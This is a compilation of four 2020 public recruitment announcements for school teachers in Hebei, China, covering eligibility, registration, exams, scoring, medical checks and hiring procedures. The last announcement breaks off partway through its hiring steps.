按照市委组织部、市人力资源和社会保障局《承德市事业单位公开招聘工作人员暂行办法》(承人社字〔2011〕87号)文件精神,结合高新区2020年中小学教师岗位空缺情况,面向社会公开招聘全额事业编制教师27名,现将有关事项公告如下:
一、组织领导
成立承德高新区2020年事业单位公开招聘教师工作领导小组,负责高新区2020年公开招聘教师的领导工作。成立承德高新区2020年事业单位公开招聘教师领导小组办公室,设在高新区人力资源和社会保障局,负责高新区2020年公开招聘教师具体的组织工作。
二、招聘原则
按照德才兼备的用人标准,坚持公开、公正、公平、择优的原则。
三、招聘方式
采取公开招聘方式。按照发布招聘公告、报名及资格审查、招聘考试(笔试、面试)、体检、考核政审、拟聘人员公示、聘用等步骤进行。
四、招聘岗位及数量
承德高新技术产业开发区2020年公开招聘全额事业编制教师27名,其中17名用于招聘2020年国家统招高校应届毕业生。具体招聘人数和岗位条件详见《承德高新区2020年事业单位公开招聘教师岗位信息表》(详见附件1)。
五、招聘条件
(一)应聘人员应具备以下基本条件:
1.具有中华人民共和国国籍。
2.政治坚定、拥护中国共产党的领导,遵守宪法和法律,具有良好的品行和职业道德。
3.年龄在18至35周岁(1984年8月5日至2002年8月5日出生的),国家统招全日制硕士研究生学历年龄可放宽到40周岁以下(1979年8月5日以后出生)。
4.要求具有国家统招全日制本科及以上学历,学历以毕业证书记载为准。2020年高校应届毕业生如因受新冠肺炎疫情影响暂未如期取得毕业生证书,需提供所在学校证明和“三方协议”原件。
5.根据人力资源和社会保障部、教育部、司法部、农业农村部、文化和旅游部、国家卫生健康委和国家知识产权局《关于应对新冠肺炎疫情影响实施部分职业资格“先上岗、再考证”阶段性措施的通知》精神,对中小学、幼儿园、中等职业学校教师资格实施“先上岗、再考证”阶段性措施,凡符合教师资格考试报名条件的教师资格认定关于思想政治素质、普通话水平、身体条件等要求的高校毕业生,可以先上岗从事教育教学相关工作,再参加考试并取得教师资格。
6.具备适应岗位要求的身体条件和心理素质。
7.具备岗位所需要的其他条件。
8.凡涉及到年龄、学历等需要进一步确定时间的,具体时间计算日期截止到招聘《公告》发布之日。
(二)有下列情形之一的人员不得报考:
1.因犯罪受过刑事处罚人员、曾被开除公职人员和失信被执行人员。
2.现役军人。
3.在公务员招考和事业单位公开招聘中被认定有作弊行为,且在禁考期限内的人员。
4.承德市机关、事业单位的正式在编工作人员(含试用期人员)。
5.承德市范围内特岗教师。
6.截止《公告》发布日未取得毕业证的人员。如受新冠肺炎疫情影响无法如期毕业的2020年应届高校毕业生,获得学历学位或取得学历学位认证时间可适当放宽。
7.报考聘用后即构成回避关系的人员(回避关系是指《河北省事业单位公开招聘工作人员暂行办法》第四十一条关于“凡与聘用单位负责人员有夫妻关系、直系血亲关系、三代以内旁系血亲或者近姻亲关系的应聘人员,不得应聘该单位负责人员的秘书或者人事、财务、纪检监察岗位,以及有直接上下级领导关系的岗位。聘用单位负责人员和选聘工作人员在办理聘用事项时,涉及与本人有上述亲属关系或者其他可能影响招聘公正的,也应当回避”);
8.法律、法规规定不得招聘为事业单位工作人员的其他情形人员。
六、招聘程序
(一)发布招聘公告
通过承德高新技术产业开发区管理委员会网站(www.cdkfq.gov.cn)面向社会公开发布招聘公告。
(二)报名和资格审查
本次招聘采取网络报名方式,每名考生只能报考一个岗位,对报考人员的资格条件进行网上初审,报名与资格初审工作同步进行。报名网址:承德高新技术产业开发区管理委员会网站,(www.cdkfq.gov.cn);报名主要环节有注册缴费、报名资格审核、招聘计划岗位核减、准考证打印等。
1.注册缴费
时间为2020年8月12日上午9:00开始至8月18日下午5:00结束,逾期将关闭报名通道,不能再进行注册报名。
考生开始报名前,须完整了解本次招聘政策和拟报考岗位条件,进入承德高新技术产业开发区管理委员会网站(www.cdkfq.gov.cn)点击“公开招聘教师报名”窗口,然后按照规定步骤进行具体操作。
首次进入报名系统时进行注册,必须输入用户名、密码和手机号码(准确记住用户名和密码,否则无法登录和查询),同一用户名或手机号码不能重复注册。每名考生需缴纳100元报名费,实行网上缴费完成注册。注册提交后,系统将自动跳转登录界面,输入注册的用户名、密码进行登录,登录后认真阅读《承德高新区2020年公开招聘考生诚信承诺书》,同意后点击“我已仔细阅读并郑重承诺”按钮。页面跳转后如实填报相关报名信息(报名与考试时的身份信息必须一致)。填报完成后提交,核对信息无误后点击“头像图片”上传照片。上传的电子照片要符合要求,否则将无法提交或不能通过报名审核。
网上报名实行严格的自律机制,考生必须承诺履行《诚信承诺书》,并对提交审核的报名信息的真实性负责。在入围面试人员资格复审时,凡发现填报的信息与实际情况不一致的,经查实,取消面试资格。
2.报名资格审核
提交报名后,请考生及时登录查询资格审核情况。未通过审核的,要在规定报名时间内及时修改完善个人信息可以再次提交审核。不按要求进行操作造成的后果自负。
3.招聘计划与核减岗位
报名结束后,如果报名人数达不到招聘岗位开考比例的(岗位计划数与报名人数比例为1:3),承德高新区2020年事业单位公开招聘教师工作领导小组根据报名情况对岗位计划进行核减或取消。招聘计划变更信息将在承德高新技术产业开发区管理委员会网站(www.cdkfq.gov.cn)对外公布,请考生及时查看。被核减或取消岗位的考生可在规定时间内改报一次其他符合条件的岗位。
4.准考证打印
考生网上报名成功后,在规定时间内登录报名系统下载笔试准考证,自行打印。网上下载准考证时间详见承德高新技术产业开发区管理委员会网站(www.cdkfq.gov.cn)通知。
(三)考试
此次招聘考试由承德高新区2020年事业单位公开招聘教师工作领导小组负责实施。考试分笔试和面试,笔试成绩占总成绩的40%,面试成绩占总成绩的60%。
1.笔试
(1)笔试采取闭卷的方式。笔试科目包括《公共基础知识》和《职业能力测试》(教育学、教育心理学、教材教法等),笔试实行百分制,二科合并在一张试卷上,满分100分,承德高新区2020年事业单位公开招聘教师领导小组根据笔试成绩设定最低合格分数线。
(2)笔试时间:具体时间以准考证为准。
(3)笔试地点:以笔试准考证为准。
(4)笔试组织:考试严格按照国家、省、市事业单位公开招聘相关政策规定执行。承德高新区2020年事业单位公开招聘教师领导小组办公室将加强对考试过程的全程监管,并充分利用现代科技手段防控不法分子利用高科技设备作弊,以确保考试安全进行。
(5)笔试成绩查询:考试结束后,笔试成绩在承德高新技术产业开发区管理委员会网站(www.cdkfq.gov.cn)进行公布。
(6)资格复审。面试前,由承德高新区2020年事业单位公开招聘教师领导小组办公室对参加面试人员进行资格条件复审,时间、地点在网站另行通知。资格条件复审时,考生本人应提供防疫健康状况材料,提供本人身份证原件和复印件,笔试准考证原件和复印件,学历毕业证原件和复印件(2020年高校应届毕业生如因受新冠肺炎疫情影响暂未如期取得毕业生证书,需提供所在学校证明和“三方协议”原件),学信网查询的学历证书电子备案表,报到证原件和复印件,已取得教师资格证和普通话等级证的原件和复印件等材料。审核时,复印件按照上述顺序左侧装订,证件原件按照复印件顺序同时提交。经复审个人信息与网上报名不一致或不符合报名资格条件的,取消面试人选资格。在报考同一岗位的考生中按笔试成绩从高分到低分依次递补。
2.面试
面试过程全程录像,接受纪检监察机关监督。具体操作按面试相关规定及要求进行。
(1)面试人选确定:依据笔试成绩从高分到低分按计划招聘人数与进入面试人选1:3的比例确定面试人选,比例内末位笔试总成绩并列的都进入面试。
(2)面试时间和地点:见承德高新技术产业开发区管理委员会网站(www.cdkfq.gov.cn)的通知。
(3)面试方式:
采取说课和答辩两种形式组成,每人的面试时间为12分钟,其中说课8分钟,答辩4分钟。内容为应聘人员所报专业岗位的相关教材内容等,主要考察专业素质和综合能力。
面试按各学科岗位特点统一题本,面试实行百分制,满分为100分。
面试根据考生人数合理分组,报考同一岗位的考生一般分在同一面试组和面试场次。人数较多的采取蛇形分组法分组,并将招聘计划合理划分到每个面试小组,按组录取,哪组出现空缺,在哪组顺延递补。
考生抽签决定面试顺序,再抽签取得面试内容并进行15分钟的面试准备。评委现场打分,按照“体操打分”方法,去掉一个最高分和一个最低分,其他评委所评分数的平均分为考生的面试成绩(保留两位小数,四舍五入)。为确保招聘质量,面试成绩低于60分者为不合格。面试成绩在全部考生面试结束后,予以公布。
(4)总成绩合成:面试结束后,按笔试成绩、面试成绩两部分计算考试总成绩,满分100分,考试总成绩=笔试成绩×40%+面试成绩×60%(保留两位小数,四舍五入)。成绩在承德高新技术产业开发区管理委员会网站(www.cdkfq.gov.cn)公布。面试工作结束后,考生登录此网站查看本人是否进入体检环节。
(四) 体检
体检工作由承德高新区2020年事业单位公开招聘教师领导小组办公室负责组织。体检标准参照现行公务员录用体检通用标准,体检费用由参加体检考生据实支付。
根据招聘计划和考生总成绩从高到低的排列顺序,分岗位按1:1的比例确定参加体检人员名单。比例内末位考生出现总成绩并列时,面试成绩高者进入体检。如出现笔试、面试和总成绩均相同者,按以下顺序确定进入体检考生:烈士子女或配偶;笔试成绩较高者,学历(学位)较高者(如果学历、学位相同,按照学历 “985”院校、“211”院校、一本、二本、三本的顺序录取);少数民族;曾受县级以上党委、政府奖励且受奖级别较高者;具有基层工作经历或基层工作经历较长者。如以上条件均相同,都进入体检、考核环节,根据体检、考核结果择优聘用。体检不合格的,按考核总成绩报考同一岗位的人员中从高到低依次递补。
(五)考核政审
主要审核本人档案和相关证明资料,采取多种形式,全面了解被考核对象的政治思想、道德品质、自律意识、业务能力、工作实绩以及需要回避等情况,对其报考条件进行资格复审。考核政审不合格的,取消入选资格,按招聘岗位总成绩从高分到低分依次递补,并对递补考生进行体检、考核。
(六)拟聘人员公示
根据考生总成绩、体检和考核政审结果,经承德高新区2020年事业单位公开招聘教师领导小组研究确定拟聘用人员名单,确定拟聘人选后,在承德高新技术产业开发区管理委员会网站(www.cdkfq.gov.cn)进行公示,公示期7个工作日。公示期间因各种原因取消、放弃考核的考生取消其招聘资格,按招聘岗位总成绩从高分到低分依次递补,并对递补考生进行体检、考核、公示。
(七)聘用
1.公示无异议的人员,由承德高新区2020年事业单位公开招聘教师领导小组提出聘用意见,下达聘用通知后,由聘用单位填写《河北省事业单位公开招聘工作人员审批表》,报承德市人力资源和社会保障局备案。按照有关规定签订聘用合同,办理相关手续。
2.被聘用人员按政策规定实行试用期,试用期满考核合格的予以正式聘用,不合格的,取消聘用。试用期一并计算在聘用合同期限内。
3.尚未取得教师资格证高校毕业生,凡符合教师资格考试报名条件和教师资格认定关于思想政治素质、普通话水平、身体条件等要求可先报考。聘用后,事业单位与其签订聘用合同时,按规定约定1年试用期,试用期内未取得相应岗位要求教师资格证的,应依法解除聘用合同。(若试用期内国家未如期组织相应岗位要求的教师资格证考试,由用人单位与其约定取得取证期限并写入聘用合同,若未如期取得,则依法解除聘用合同)。
4.资格审查贯穿招聘全过程,在任何环节发现有弄虚作假,提供不实、虚假信息、材料的,一经查实,即取消聘用资格。
七、有关要求
落实疫情精准防控要求,在切实做好疫情防控工作基础上安全有序开展。在招聘工作中严格按照《暂行办法》组织实施。对在招聘工作中违反组织人事纪律、徇私舞弊的,要追究相关人员的责任,情节严重的要依据有关规定严肃处理,对通过弄虚作假被聘用的人员,要取消其聘用资格,以确保公开招聘工作的严肃性和公正性。
八、其它事项
本方案由承德高新区2020年事业单位公开招聘教师领导小组负责解释。其它未尽事宜,由承德高新区2020年事业单位公开招聘教师领导小组协商市人力资源和社会保障局研究确定。
联系电话:0314-2569905
监督电话:0314-2521981
详情登录
http://m.cdkfq.gov.cn/news_show.aspx?id=71356&from=timeline
盐山县职教中心2020年公开招聘教师公告
为满足县职教中心教师需要,进一步优化教师队伍,经县政府批准,拟面向社会公开招聘教师26名,现就有关事项公告如下:
一、招聘原则和方式
按照德才兼备的用人标准和公开、平等、竞争、择优的原则,面向社会公开招聘工作人员。通过笔试、面试、考察等程序择优招聘。
二、招聘数量、岗位和条件
(一)招聘专业及人数
(二)应聘人员应具备以下基本条件
1、遵守国家法律法规,无违纪处分及违法记录;
2、遵守纪律,品行端正,热爱教育事业,具备良好的职业道德素养和团队精神;
3、具备教师职业所需要的专业知识水平、教育教学能力和心理素质,能胜任教育教学工作;
4、全日制二本及以上学历,所学专业与学科相近或一致;
5、年龄在35周岁以下(1985年8月13日以后出生);
6、未取得教师资格证书的高校毕业生(指2020届高校毕业生以及2018、2019届尚未落实工作单位的高校毕业生),按照招聘程序被录取聘用后,必须在一年内取得教师资格证书,凡在规定时间内未能取得教师资格证书的解除劳动合同;
7、身体健康。
(三)有下列情形之一的人员不得报考
1.正在接受司法机关、纪检监察机关立案侦查审查的;
2.曾因犯罪受过刑事处罚的和曾被开除公职的;
3.现役军人;
4.失信被执行人;
5.法律、法规规定不得招聘为事业单位工作人员的其他情形人员。
三、招聘程序
(一)发布公告
2020年8月5日至2020年8月13日在盐山政务网、盐山快报、盐山教育局网站、盐山县职教中心校园网向社会公开发布招聘信息,公告时间7个工作日。
(二)报名和资格审查
1、报名时间:2020年8月13日至2020年8月14日,上午8:30-12:00;下午2:30-5:30。
2、报名地点:盐山职教中心一楼办公室。
3、报名联系人:张老师:13315769562 高老师:18903176211。
4、报名办法:采取现场报名的方式,考生报名后保持电话畅通。
5、报名要求:(1)每名报考人员只能报考一个岗位,报考人员需提交个人简历、本人二代身份证、毕业证书、教育部学历证书电子注册备案表、获奖证书、资格证书等原件及复印件、小二寸近期同底免冠彩色照片4张(照片背面注明考生姓名和报考岗位)。(2)填写“盐山县职教中心招聘应聘表”。
6、资格审查:由县教育局、县人社局、县职教中心依据招聘岗位设置的条件进行资格审查,资格审查结果现场确认。
7、准考证发放:审查合格人员于2020年8月15日下午2:30-5:30,持二代身份证到盐山县职教中心办公楼一楼办公室领取准考证;审查不符合条件的,取消考试资格。逾期不领者,视为主动放弃。
(三)考试
考试分为笔试和面试。考试工作委托有资质的第三方考试测评机构严格按照《河北省事业单位公开招聘工作人员暂行办法》和《河北省事业单位公开招聘工作人员面试工作规则(试行)》组织实施。
1.笔试
(1)笔试内容为公共基础知识和专业基础知识,考试不指定考试辅导用书。笔试实行百分制,满分100分。
(2)考试比例:岗位报考人数与招聘人数比例原则上不低于2:1,报考人数达不到开考比例的,经公开招聘领导小组同意,可降低开考比例或取消该岗位招聘计划。招聘计划的调整于开考前公布。
(3)笔试时间和地点详见准考证。
(4)笔试结束后笔试成绩在盐山政务网公布。
2.面试
(1)面试人员确定:根据招聘计划按考生笔试成绩1:1.5比例确定进入面试人选(如开考比例降至1:1,该比例也相应调整至1:1),入围面试末位考生笔试成绩并列者一并纳入面试范围。
(2)面试时间、地点及注意事项登陆盐山政务网查询。
(3)面试方式。采用试讲及现场答辩的方式。
根据不同学科提供教材,指定章节,准备20分钟,试讲10分钟。对应聘者进行语言表达能力、学生及学科教学提问的测评。面试采取当场打分,去掉一个最高分和一个最低分,计算其他分数的平均分为面试成绩,满分为100分。
(4)面试成绩于面试结束后在盐山政务网发布。
3.总成绩合成及排名确定
笔试成绩、面试成绩两部分计算考试总成绩,满分 100分。其中,笔试成绩、面试成绩分别占50%、50%(计算考生成绩时,保留小数点后两位)。同一岗位末位总成绩出现并列时,按学历层次、面试成绩由高到低进行区分排名。若仍不能区分排名者,由招聘领导小组研究确定。在此后的资格复审、体检、考察、公示等环节发现问题需要递补时,均按此办法确定。
注意事项:1、应聘人员前来报名、笔试和面试时应佩戴口罩并持有健康绿码、严格进行体温检测,有发热症状(体温≥37.3℃)的人员一律不得参加此次招聘,及时到定点医院诊治。2、中高风险地区来盐人员要持有7日内一次核酸检测证明,且持有健康绿码,体温正常后方可进入。
(四)资格复审
面试结束后,依据招聘计划数与考生从高到低的总成绩排名,按照1:1的比例确定资格复审人员。
进入资格复审的考生,必须在规定时间内到指定地点参加复审,资格复审所需材料除现场报名时资格审查所提供的材料外,还需携带个人档案。复审不符合条件的,取消应聘人员资格。逾期不提交资格审查材料的,视为自动放弃资格。在报考同一岗位的考生中,按总成绩由高到低的顺序依次递补。
(五)体检
资格复审合格人员,进入体检环节,体检人员名单在盐山政务网公布。体检由县教育局、县人社局、县职教中心共同组织实施。体检标准参照《公务员录用体检通用标准》执行。无故不参加体检者视为自动放弃,体检不合格者取消应聘资格。
(六)考察
体检合格人员进入考察环节。考察由县教育局、县人社局、县职教中心共同组织实施,主要考察应聘人员思想政治表现、道德品质、业务能力、工作实绩等情况。考察不合格的,取消应聘人员资格。
(七)公示
拟聘用人员名单由招聘工作领导小组确定,在盐山政务网公示。时间为7个工作日,拟聘用人员在公示期内因弄虚作假或营私舞弊等情况被举报查实的,取消其拟聘用资格。
(八)聘用
对公示无异议的人员,经审核后,办理聘用手续,签订劳动合同。被聘用人员应在规定时间内到用人单位报到,超过规定时间不报到者,取消其聘用资格。
四、聘用人员待遇
本次招聘的教师为编外教师,工资标准参照在编教师工资标准执行,按企业缴纳养老、医疗、生育、工伤保险和住房公积金。用人单位与本人签订劳动合同,合同期限为三年,试用期六个月,试用期一并计算在合同期内,试用期满经考核合格的留任,考核不合格的解除合同。合同期满考核合格的,经双方协商可续签劳动合同。
五、组织机构
成立由分管教育副县长为组长,县教育局、县人社局、县财政局、县职教中心主要负责人为成员的招聘工作领导小组。领导小组下设办公室,办公室设在县职教中心,办公室主任由县职教中心校长兼任。
六、有关要求
凡考生未在规定时间内按要求参加笔试、资格审核、面试、体检、考察、报到等情况的,均视为自动放弃应聘资格;资格审核贯穿招聘工作全过程,在任何环节,发现考生不符合招聘条件,弄虚作假的,取消应聘资格,问题严重的要追究责任。
咨询电话:(0317)6225523
(0317)6221778-8309
详情登录
http://www.chinayanshan.gov.cn/zwdt/gsgg/4627.html
盐山中学关于2020年公开招聘教师公告
为进一步增强学校师资力量,满足盐山中学教师队伍建设的需要,经县政府批准,拟面向社会公开招聘教师19名,现就有关事项公告如下:
一、招聘原则和方式
按照德才兼备的用人标准和公开、平等、竞争、择优的原则,面向社会公开招聘工作人员。通过笔试、面试、考察等程序择优招聘。
二、招聘数量、岗位和条件
(一)招聘科目及人数
(二)应聘人员应具备以下基本条件
1.具有中华人民共和国国籍;
2.遵守国家法律法规;
3.品行端正,热爱教育事业,具备良好的职业道德;
4.具备教师职业所需要的专业知识水平、教育教学能力和心理素质;
5.全日制一本及以上学历应往届毕业生(与应聘学科相关专业达到全日制硕士学历的,第一学历可放宽到全日制本科),所学专业与学科相近或一致;
6.年龄在35周岁以下(1985年8 月 6日以后出生);
7.未取得教师资格证书的高校毕业生(指2020届高校毕业生以及2018、2019届尚未落实工作单位的高校毕业生),按照招聘程序被录取聘用后,必须在一年内取得教师资格证书,凡在规定时间内未能取得教师资格证书的解除劳动合同;
8.身体健康。
(三)有下列情形之一的人员不得报考
1.正在接受司法机关、纪检监察机关立案侦查审查的;
2.曾因犯罪受过刑事处罚的和曾被开除公职的;
3.现役军人;
4.失信被执行人;
5.法律、法规规定不得招聘为事业单位工作人员的其他情形人员。
三、招聘程序
(一)发布公告
2020年8月5日至2020年8月13日在盐山县电视台、盐山政务网、盐山教育局网站、盐山中学网站、盐山中学微信平台向社会公开发布招聘信息,公告时间7个工作日。
(二)报名和资格审查
1.报名时间:2020年8月 6日至2020年8月14日,上午8:30-12:00;下午2:30-5:30。
2.报名地点:盐山中学教务处(办公楼一楼)。
3.报名联系人:马老师 电话:13931718639
蒋老师 电话:18713613355
4.报名办法:采取现场报名的方式,考生报名后保持电话畅通。
5.报名要求:每名报考人员只能报考一个岗位。报考人员需到校填写“盐山中学招聘应聘表”。并提交个人简历、本人二代身份证、毕业证书、获奖证书、教育部学历证书电子注册备案表、资格证书等原件及复印件、小二寸近期同底免冠彩色照片4张(照片背面注明考生姓名和报考岗位)。
6.资格审查:由县教育局、县人社局、盐山中学依据招聘岗位设置的条件进行资格审查,资格审查结果现场确认。
7.准考证发放:审查合格人员于2020年8月14 日15:00,持二代身份证到盐山中学教务处领取准考证;审查不符合条件的,取消考试资格。逾期不领者,视为主动放弃。
(三)考试
考试分为笔试和面试。考试工作委托有资质的第三方考试测评机构严格按照《河北省事业单位公开招聘工作人员暂行办法》和《河北省事业单位公开招聘工作人员面试工作规则(试行)》组织实施。
1.笔试
(1)笔试内容为专业基础知识,考试不指定考试辅导用书。笔试实行百分制,满分100分。
(2)考试比例:岗位报考人数与招聘人数比例原则上不低于2:1,
报考人数达不到开考比例的,经公开招聘领导小组同意,可降低开考比例或取消该岗位招聘计划。招聘计划的调整于开考前公布。
(3)笔试时间和地点:详见准考证。
(4)笔试结束后,笔试成绩在盐山政务网和盐山中学微信平台公布。
2.面试
(1) 以考生笔试成绩确定面试人员,根据招聘计划按考生笔试成绩1:1.2的比例确定面试人员(如开考比例降至1:1,该比例也相应调整至1:1),入围面试末位考生笔试成绩并列者一并纳入面试范围。
(2)面试时间、地点及注意事项登陆盐山政务网查询。
(3)面试方式。采用试讲及现场答辩的方式。
根据不同学科提供教材,指定章节,现场准备30分钟,试讲15分钟。对应聘者进行语言表达能力、学生及学科教学提问的测评。面试采取当场打分,去掉一个最高分和一个最低分,计算其它分数的平均分为面试成绩,满分为100分。面试成绩当天在面试考点公布,并在盐山政务网和盐山中学微信平台公示。
3.总成绩合成及排名确定
按笔试成绩、面试成绩两部分计算考试总成绩,满分 100分。其中,笔试成绩、面试成绩分别占60%、40%。同一岗位末位总成绩出现并列时,按学历高者、笔试成绩高者优先方法。若仍不能区分排名者,由招聘领导小组研究确定。在此后的资格复审、体检、考察、公示等环节发现问题需要递补时,均按此办法确定。
注意事项:①应聘人员前来报名、笔试和面试时应佩戴口罩并持有健康绿码、严格进行体温检测,有发热症状(体温≥37.3℃)的人员一律不得参加此次招聘,及时到定点医院诊治。②中高风险地区来盐人员要持有7日内一次核酸检测证明,且持有健康绿码,体温正常后方可进入。
(四)资格复审
面试结束后,依据招聘计划数与考生从高到低的总成绩排名,按照1:1的比例确定资格复审人员。
进入资格复审的考生,必须在规定时间内到指定地点参加复审,资格复审所需材料除现场报名时资格审查所提供的材料外,还需携带个人档案。复审不符合条件的,取消应聘人员资格。逾期不提交资格审查材料的,视为自动放弃资格。在报考同一岗位的考生中,按总成绩由高到低的顺序依次递补。
(五)体检
资格复审合格人员,进入体检环节。体检人员名单在盐山政务网公布。体检由县教育局、县人社局、盐山中学共同组织实施。体检标准参照《公务员录用体检通用标准》执行。无故不参加体检者视为自动放弃,体检不合格者取消应聘资格。
(六)考察
体检合格人员进入考察环节。考察由县教育局、县人社局、盐山中学共同组织实施,主要考察应聘人员思想政治表现、道德品质、工作能力和现实表现等情况。考察不合格的,取消应聘人员资格。
(七)公示
拟聘用人员名单由招聘工作领导小组确定,在盐山政务网公示。时间为7个工作日, 拟聘用人员在公示期内因弄虚作假或营私舞弊等情况被举报查实的,取消其拟聘用资格。
(八)聘用
对公示无异议的人员,经审核后,办理聘用手续,签订劳动合同。被聘用人员应在规定时间内到用人单位报到,超过规定时间不报到者,取消其聘用资格。
四、聘用人员待遇
本次招聘的教师为编外教师,工资标准参照在编教师工资标准执行,按企业缴纳养老、医疗、生育、工伤保险和住房公积金。用人单位与本人签订劳动合同,合同期限为三年,试用期六个月,试用期一并计算在合同期内,试用期满经考核合格的留任,考核不合格的解除合同。合同期满考核合格的,经双方协商可续签劳动合同。
五、组织机构
成立由分管教育副县长为组长,县教育局、县人社局、县财政局、盐山中学主要负责人为成员的招聘工作领导小组,领导小组下设办公室,办公室设在盐山中学,办公室主任由盐山中学校长兼任 。
六、有关要求
凡应聘人员未在规定时间内按要求参加笔试、资格审核、面试、体检、考察、报到等情况的,均视为自动放弃应聘资格;资格审核贯穿招聘工作全过程,在任何环节,发现考生不符合招聘条件,弄虚作假的,取消应聘资格,问题严重的要追究责任。
咨询电话:盐山中学(0317)6086910
盐山县人社局(0317)6221778-8309
详情登录
http://www.chinayanshan.gov.cn/zwdt/gsgg/4626.html
石家庄市新华区教育局2020年公开招聘派遣制教师公告
为努力打造新华区精品学校,加强教师队伍建设,带动全区教育水平再上新台阶,实现教育强区目标,经研究决定,新华区计划公开招聘中小学派遣教师250名,现就有关事项公告如下:
一、 招聘原则
坚持德才兼备、凡进必考的原则;坚持公平、公正、公开的原则;坚持竞争、择优的原则。
二、 招聘岗位
派遣制教师250名,其中小学教师220人:语文135人、数学45人、英语12人、音乐6人、体育8人、计算机2人、科学5人、道德与法治7人,中学教师30人:语文8人、数学1人、英语9人、政治6人、历史1人、地理2人、化学1人、生物1人、美术1人,详见《石家庄市新华区公开招聘教师岗位信息表》(附件1)。
三、 招聘条件
基本条件
1.拥护中国共产党的领导,思想政治素质好、热爱教师职业、认真贯彻教育方针、恪守教师职业道德,具有良好的品行,身心健康;
2.具有中华人民共和国国籍,全日制普通本科学历,年龄在18周岁以上(2002年8月5日前出生),35周岁以下(1985年8月5日以后出生),研究生学历可以放宽到37周岁以下(1983年8月5日以后出生);
3.遵纪守法,品行端正,具有良好职业道德;
4.小学教师:具有全日制普通高等学校本科及以上学历(可在学信网查到,非在读研究生);小学教师岗位要求所学专业与所报考岗位相符;
5.中学教师:具有全日制普通高等学校本科及以上学历(可在学信网查到,非在读研究生);所学专业与报考岗位一致;
6.具有中小学及以上教师资格证,且报考岗位应与教师资格证任教学科一致或相近;
7.身体健康,具备岗位所需的身体条件;
8.按照人力资源和社会保障部、教育部等七部委《关于应对新冠肺炎疫情影响实施部分职业资格“先上岗、再考证”阶段性措施的通知》(人社部发〔2020〕24号)要求,凡符合教师资格考试报名条件和教师资格认定条件,未取得教师资格证书的高校毕业生(指2020届高校毕业生以及2018、2019届尚未落实工作单位的高校毕业生)可以先报考,录取上岗后再考证,并在一年内取得符合报考岗位学段、学科要求的教师资格证书。凡在规定时间内未能取得相应教师资格证书的,应依法解除聘用合同(取得符合条件的教师资格证的时间不得晚于2021年9月1日)。此类人员应如实报名,待通过笔试后,将根据其养老保险缴纳情况判别是否符合“尚未落实工作单位”相关政策,如不符合政策要求,将取消该考生应聘资格,按照同岗位笔试成绩由高到低向下递补。
四、 报名办法
此次报名,实行网上报名和资格初审,每人限报考一个岗位。
(一)网上报名和资格初审
报名网址:http://www.noahjob.cn/s/22279(电脑端)
http://m.noahjob.cn/s/22280(移动端)
报名时间:8月5日9:00至8月11日18:00
缴费时间:8月5日9:00至8月12日14:00
报名咨询电话:0311-83827682、0311-67362221
网上报名的基本程序:
1.考生开始报名前,须完全了解本次招聘政策和招聘岗位条件,报名即默认诚信报名,并参照《石家庄市新华区2020年公开招聘教师报考公告》进行具体操作。
2.网上报名实行严格的自律制度,考生必须履行诚信承诺,对提交审核的报名信息的真实性负责,在资格复审时,凡发现网上填报的信息与实际情况不一致的,取消应聘资格。
3.资格审查将通过考生在网上提交的《教育部学历证书电子注册备案表》或《教育部学籍在线验证报告》在线验证码,在学信网上审核考生的毕业院校、学历、学制、专业、年龄等信息,根据考生在网上报名环节提交的《教师资格证》编号等信息等进行网上审核。
4.考生“提交审核”后信息将被锁定,一般情况下,审核员24小时内会在报名系统上回复审核结果。“审核未通过”的,考生可根据提示的未通过原因,修改信息或改报岗位并重新提交审核;“审核通过”的,不能再修改,将进入缴费程序。
5.考生网上缴纳考试服务费100元,系统显示缴费成功后即报名通过,具备参加笔试资格。
6.考生务必牢记报名截止时间、打印《笔试准考证》时间、笔试时间、资格复审时间、打印《面试通知单》时间、面试时间等重要时间信息,凡是在规定时间内未完成相关操作的,将被视为自动放弃。同时,考生在报名和考试期间务必保管好个人的证件和信息,因个人原因丢失、被他人盗用和信息被恶意篡改而影响报名和考试的,责任自负。
(二)报考岗位的招考人数与报名人数之比不低于1:2,达不到该比例的,按比例减少该岗位招考人数直至取消该岗位。核减或取消的岗位招录人数,根据报名情况补充到其他岗位招录人数中。
(三)应聘考生完成网上报名后,于8月13日至8月15日登录报名网站自助打印《笔试准考证》,笔试时间及具体考点和要求详见笔试公告及《笔试准考证》。
五、 考试内容及时间
本次招聘采取笔试、面试相结合的形式进行。
(一) 笔试
1.打印笔试准考证时,考生还需同时下载打印《个人健康信息承诺书》。不实承诺,隐瞒病史、旅行史、接触史、逃避防疫措施,造成严重后果的,将依法依规追究责任。
2.笔试时间具体地点以《笔试准考证》为准。参加考试时,考生必须同时携带准考证、有效期内二代身份证或临时身份证、河北健康码绿码、《个人健康信息承诺书》,缺少证件的考生不得参加考试。
3笔试内容包括教育学、教育心理学、教学教法、教育法律法规、教师职业道德、时事政治等(不指定复习材料)。
4.满分为100分,根据招聘计划和笔试成绩确定各岗位笔试合格分数线,笔试合格的考生依岗位由高分至低分按1:2比例确定进入面试阶段,如各岗位最后一名笔试成绩并列的一并进入面试阶段。
(二)面试
进入面试的考生请及时关注面试公告,并在网上报名系统自行下载打印《面试通知单》。
面试采取现场试讲:采取(微型课)方式进行,面试时间为10分钟。按岗位类别抽签决定面试顺序,面试采取现场打分的方式进行。考生完成面试后在面试室外等候成绩,在下一考生面试结束后回到面试室听取面试成绩后即可离场(面试全程录像),满分100分,合格分数线60分,面试成绩占总成绩60%。
面试考生分组:报考同一岗位的考生一般分在同组面试。因招聘人数较多无法分在同组的岗位,根据笔试总成绩的排名顺序进行“蛇型”分组,并将招聘计划合理均分到各组,考试总成绩按“蛇型”分组后的面试组排序,并分别使用“蛇型”分组分配的招聘计划。当招聘计划无法平均分配时,将剩余招聘计划按分组顺序优先并入第一组。
六、总成绩查询及体检公告
考生考试的综合成绩为:笔试成绩×40%﹢面试成绩×60%。按照考生综合成绩由高分到低分依岗位按1:1的比例确定进入体检人员,请考生及时关注公告,并自助打印《体检通知单》。
比例内末位考生综合成绩如出现并列,按以下顺序确定进入体检考生:笔试成绩高者,学历(学位)较高者,烈士子女或配偶。
七、体检
考生执有效期内的二代居民身份证或临时居民身份证及《体检通知单》进行体检,详细时间、地点及注意事项见《体检通知单》。体检项目标准参照《公务员体检通用标准(试行)》的有关规定执行,体检费用自理。
八、拟聘用公示
体检合格的考生确定为拟录用人员,在诺招聘网站公示,公示期为3个工作日。
九、签订合同上岗
1.经公示期满无异议的拟录用人员,或有反映问题但经核实不影响录用的,按规定签订劳务派遣合同,办理录用手续,并派遣至新华区各学校,拟定2020年9月1日正式上岗。
